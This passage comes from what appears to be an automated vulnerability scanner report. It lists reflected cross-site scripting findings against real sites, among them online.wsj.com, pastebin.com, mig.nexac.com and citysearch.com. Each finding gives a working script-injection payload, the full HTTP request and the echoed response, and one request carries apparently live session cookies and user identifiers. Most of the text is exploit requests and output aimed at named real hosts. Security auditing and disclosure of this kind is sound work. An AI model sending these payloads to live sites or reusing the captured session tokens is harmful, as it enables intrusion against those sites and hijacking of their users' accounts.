User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW802t6rQACp/p; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM57401"><script>alert(1)</script>c45cd3456f/DLX/613821370/x96/default/empty.gif/72634857383032743672514143702f70?x" target="_top"><IMG SRC="
...[SNIP]...

3.262. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b04c"><script>alert(1)</script>d331ea74841 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX3b04c"><script>alert(1)</script>d331ea74841/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:06 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW802t6rYACzMV; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX3b04c"><script>alert(1)</script>d331ea74841/1296153028/x96/default/empty.gif/726348573830327436725941437a4d56?x" target="_top"><IMG SRC
...[SNIP]...

3.263. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 673dc"><script>alert(1)</script>a2584dc8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x96673dc"><script>alert(1)</script>a2584dc8a HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:08 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW802t6rgADA1J; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 316
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX/515170640/x96673dc"><script>alert(1)</script>a2584dc8a/default/empty.gif/7263485738303274367267414441314a?x" target="_top"><IMG SRC="h
...[SNIP]...

3.264. http://online.wsj.com/pznusersvc/view/user/profile [profileType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /pznusersvc/view/user/profile

Issue detail

The value of the profileType request parameter is copied into the HTML document as plain text between tags. The payload ac37d<img%20src%3da%20onerror%3dalert(1)>b99e259bd90 was submitted in the profileType parameter. This input was echoed as ac37d<img src=a onerror=alert(1)>b99e259bd90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pznusersvc/view/user/profile?profileType=weatherCodeac37d<img%20src%3da%20onerror%3dalert(1)>b99e259bd90 HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=ce32ca17-585f-4a0a-99bf-c279acbbbcbf; s_dbfe=1282392681928; __qca=P0-743540389-1290545978930; _jsuid=6513768286877581798; __g_u=395535113978113_28_1_0_5_1301679673414; ebNewBandWidth_.online.wsj.com=3617%3A1302926418459; mbox=PC#1300360459279-276749.17#1304331804|check#true#1303122264|session#1303122203590-384831#1303124064; CMC=top; _chartbeat2=zupc84z6lzxpous0; rsi_csl=; rsi_segs=; DJCOOKIE=ORC%3Dna%2Cus%7C%7CHOMEPAGE%3D%2Fhome%2Fus%7C%7CweatherUser%3D8fac3139-0617-465d-9960-22995a8c9638%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2262%22%5D%2C%22low%22%3A%5B%2247%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2019%20Apr%202011%2015%3A24%3A45%20GMT%7C%7CweatherCode%3D10005; djcs_demo=VjE6IQ%3D%3D; user_type=subscribed; TR=V1-OGZhYzMxMzktMDYxNy00NjVkLTk5NjAtMjI5OTVhOGM5NjM4; REMOTE_USER=8fac3139-0617-465d-9960-22995a8c9638; djcs_auto=M1303160624%2Fic7oHVSe6ZAJJvgji0B47XEN7w%2FChJjS3fhu02YDm5SWDDhy0Zn10b3M4d%2BwOiE6TpMhpUCwoXVyRw%2FH8XEelmXLalE62E%2F5bpT7EtL4mlwgNTgmuTNg5op9EUcdEtLW08KplzCxais88jelwpHnytOHVEhTfZzL%2BFjNmIJwuDbqlsTDqLUtPkBYAYRpELuy491fnh7wLkK2ux2IkVilOg%3D%3DG; djcs_session=M1303224228%2F8WLYaffKNNSJoOMfA3ykV6nDXspVXjtSlYhYtLLSg4iR03CgrlHezKBKUwHHVH24WAIx6%2F3OXAqNl5o687PJyRSTynKANcUD6kENtnvmWKLgTErQkUNCUrR1wI2rP7fHFwBCVPxN1RsojWYSv8I1CmZ8lbxW1n91We91bpWt%2FjgOL0u%2FKytXBQItfQSWVdtrA2KcjOSbB7GbftIntUDvYb5CFdhsoL%2FrPryurLxQ%2FaqrXI884qM9G32%2Fo41PjTCLKKsB8ZwYlxHmlWJqE267H5l%2BlHUOR09h%2FeVOO4VPsZbxgBRC7myYYyUzVKeEy2SFAay9%2BZ20XUnhpD9KCPYL549az4xWsGoSruEPgcjz5uKCDEWvXlzoeCApG7x3Gn7Pbo15ajtTHBjeK4n89tykZUB3SC5YWSpMpL9tQvAL7tQ%3DG; 
djcs_perm=M1303160624%2FvsgK966n7YDJYxNSotx%2Fk2poHCLRGJNkO65i365%2BHvN002%2FoBHhigAUNtfsMwKv8qh0vciaQHa15q2s5Ci7aDvRjtgyZR3hTI9DCkZI9wyOQOoYirlZ5DyAFUfGrYSA1JDgeqko%2BE7GXEO35K8%2BZXt0cdaE6OfTOXYdAi%2BFcxFgrvbJNP3fAfpO%2BmkBlwzNOMwr%2BHudSpNkioj%2BnLSZFBLro2RBMwNrMRjQr1BuItHq47zKHuIsRT3zRaoPvA5SbhVru9p4WwAwJJnaI3tujq87oQvzv%2BWD0ue81BVOMtDAAl3VieQ%2B8kHf%2FabiTCQ9rjsaWLJhxWGnwiEZ%2FQ%2Fv5Qg%3D%3DG; wsjlocal=VjE6aDAyMzMyQGdtYWlsLmNvbToyLDMsNCw3Miw3MywxNjEsMjgxLDMwMSw0ODEsODQxLDg2MQ%253D%253D; djcs_info=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%3D%3D; DJSESSION=ORCS%3dna%2cus; wsjregion=na%2cus; s_vnum=1304458932007%26vn%3D49; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; spotlightSet=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 16:08:16 GMT
Server: Apache-Coyote/1.1
Set-Cookie: djcs_session=M1303224228%2FVpq2KvLNR7q3fjbF2kA2U%2FD%2F8HXnmY0REsJgp%2FFIbcos7XSLMH8qwSgfoN%2BO1GEJyfeIAP1ZoO2kso9EiSL4943wq2zo74fAZydO89xjpEQN%2F16Gi8%2F6bNBUf2bz98moa47s14AW%2B%2F0uKRHy3X7uNS2HiEmX60ZrhvOxSsAccCLS%2BnVWYdx2VdqX4fYtbhv6WLGWwDfrrMJtU5zTCLxMJP0nBncYZKMYfRmHr8BOodrkCUAlByfhyskiLs87bXsT45pZK1CzyHKXX%2FbJXi2DbtbnkqkQXFBwacqYcXW7IR5VDMm7zLyLlx4CNmVzuXvp4LFx1VE4ECtX1Sox59pgfO2kquMpExbymi4hKlAkVorzRJYsTDv%2FK9UfBA6Zs%2FgLijz6Ps954vO7lvaGz6ns4i3YMt9nYTBlwEaS%2FrGGw0M%3DG; domain=.wsj.com; path=/; httpOnly
Set-Cookie: wsjlocal=VjE6aDAyMzMyQGdtYWlsLmNvbToyLDMsNCw3Miw3MywxNjEsMjgxLDMwMSw0ODEsODQxLDg2MQ%253D%253D; domain=.wsj.com; path=/
Set-Cookie: djcs_info=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%3D%3D; domain=.wsj.com; path=/
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
App: PZNUsrSvc
Method: getUser/weatherCodeac37d<img src=a onerror=alert(1)>b99e259bd90
HostName: secj2kapachep09
Version: 1.0
Status: success
Content-Type: application/json;charset=UTF-8
Content-Length: 147
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC

{"User":{"profileType":"weatherCodeac37d<img src=a onerror=alert(1)>b99e259bd90","userId":"8fac3139-0617-465d-9960-22995a8c9638","profileData":[]}}

3.265. http://pastebin.com/74KXCaEZ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /74KXCaEZ

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac1d9"><script>alert(1)</script>cc58d6ba2eb was submitted in the REST URL parameter 1. This input was echoed as ac1d9\"><script>alert(1)</script>cc58d6ba2eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /74KXCaEZac1d9"><script>alert(1)</script>cc58d6ba2eb HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:30 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:30 GMT; path=/; domain=.pastebin.com
Content-Length: 11338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/74KXCaEZac1d9\"><script>alert(1)</script>cc58d6ba2eb"/>
...[SNIP]...

3.266. http://pastebin.com/74KXCaEZ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /74KXCaEZ

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ee33"><script>alert(1)</script>b559bf62345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ee33\"><script>alert(1)</script>b559bf62345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /74KXCaEZ?6ee33"><script>alert(1)</script>b559bf62345=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:30 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:30 GMT; path=/; domain=.pastebin.com
Content-Length: 11329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/74KXCaEZ?6ee33\"><script>alert(1)</script>b559bf62345=1"/>
...[SNIP]...

3.267. http://pastebin.com/CvGXyfiJ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /CvGXyfiJ

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c0"><script>alert(1)</script>1fb414533ea was submitted in the REST URL parameter 1. This input was echoed as 491c0\"><script>alert(1)</script>1fb414533ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CvGXyfiJ491c0"><script>alert(1)</script>1fb414533ea HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:32 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:32 GMT; path=/; domain=.pastebin.com
Content-Length: 11360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/CvGXyfiJ491c0\"><script>alert(1)</script>1fb414533ea"/>
...[SNIP]...

3.268. http://pastebin.com/CvGXyfiJ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /CvGXyfiJ

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aade4"><script>alert(1)</script>5eef0908687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aade4\"><script>alert(1)</script>5eef0908687 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CvGXyfiJ?aade4"><script>alert(1)</script>5eef0908687=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:31 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:31 GMT; path=/; domain=.pastebin.com
Content-Length: 11294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/CvGXyfiJ?aade4\"><script>alert(1)</script>5eef0908687=1"/>
...[SNIP]...

3.269. http://pastebin.com/DBDqm6Km [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /DBDqm6Km

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78747"><script>alert(1)</script>13324821e99 was submitted in the REST URL parameter 1. This input was echoed as 78747\"><script>alert(1)</script>13324821e99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DBDqm6Km78747"><script>alert(1)</script>13324821e99 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:27 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:27 GMT; path=/; domain=.pastebin.com
Content-Length: 11321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/DBDqm6Km78747\"><script>alert(1)</script>13324821e99"/>
...[SNIP]...

3.270. http://pastebin.com/DBDqm6Km [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /DBDqm6Km

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d31"><script>alert(1)</script>4d54ae0ed58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7d31\"><script>alert(1)</script>4d54ae0ed58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DBDqm6Km?a7d31"><script>alert(1)</script>4d54ae0ed58=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:26 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:26 GMT; path=/; domain=.pastebin.com
Content-Length: 11330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/DBDqm6Km?a7d31\"><script>alert(1)</script>4d54ae0ed58=1"/>
...[SNIP]...

3.271. http://pastebin.com/X8znzPWH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /X8znzPWH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06bd"><script>alert(1)</script>a97465dbc53 was submitted in the REST URL parameter 1. This input was echoed as f06bd\"><script>alert(1)</script>a97465dbc53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /X8znzPWHf06bd"><script>alert(1)</script>a97465dbc53 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:28 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:28 GMT; path=/; domain=.pastebin.com
Content-Length: 11318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/X8znzPWHf06bd\"><script>alert(1)</script>a97465dbc53"/>
...[SNIP]...

3.272. http://pastebin.com/X8znzPWH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /X8znzPWH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ebb"><script>alert(1)</script>ccd34ed679c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9ebb\"><script>alert(1)</script>ccd34ed679c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /X8znzPWH?f9ebb"><script>alert(1)</script>ccd34ed679c=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:27 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:27 GMT; path=/; domain=.pastebin.com
Content-Length: 11352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/X8znzPWH?f9ebb\"><script>alert(1)</script>ccd34ed679c=1"/>
...[SNIP]...

3.273. http://pastebin.com/u/ComodoHacker [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /u/ComodoHacker

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f518"><script>alert(1)</script>94a013f3381 was submitted in the REST URL parameter 1. This input was echoed as 2f518\"><script>alert(1)</script>94a013f3381 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /u2f518"><script>alert(1)</script>94a013f3381/ComodoHacker HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:28 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:28 GMT; path=/; domain=.pastebin.com
Content-Length: 11336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/u2f518\"><script>alert(1)</script>94a013f3381/ComodoHacker"/>
...[SNIP]...

3.274. http://pittsburgh.citysearch.com/guide/bloomfield-pittsburgh-pa/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /guide/bloomfield-pittsburgh-pa/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c597d"><script>alert(1)</script>4cc4b11b365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guide/bloomfield-pittsburgh-pa/x26amp?c597d"><script>alert(1)</script>4cc4b11b365=1 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:25 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=feb174af85881661ed80d4e9b52fb930eae49637; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:26 GMT; Path=/
Set-Cookie: cs_session=79ca58bbce2565babfd57e2d990c594c8237bdf5; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:26 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:26 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:26 GMT; Path=/
Set-Cookie: recent_geos=8667%7E%7CBloomfield; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:26 GMT; Path=/
Set-Cookie: tseg=444; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:26 GMT; Path=/
Set-Cookie: userSearchLoc=Bloomfield%20%28Pittsburgh%2C%20PA%29%7E%7C8667; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:26 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 58675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<link rel="canonical" href="http://pittsburgh.citysearch.com/guide/bloomfield-pittsburgh-pa/x26amp?c597d"><script>alert(1)</script>4cc4b11b365=1" />
...[SNIP]...

3.275. http://pittsburgh.citysearch.com/guide/pittsburgh-pa/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /guide/pittsburgh-pa/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a0f"><script>alert(1)</script>9c07a67884d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guide/pittsburgh-pa/x26amp?21a0f"><script>alert(1)</script>9c07a67884d=1 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:13 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:13 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
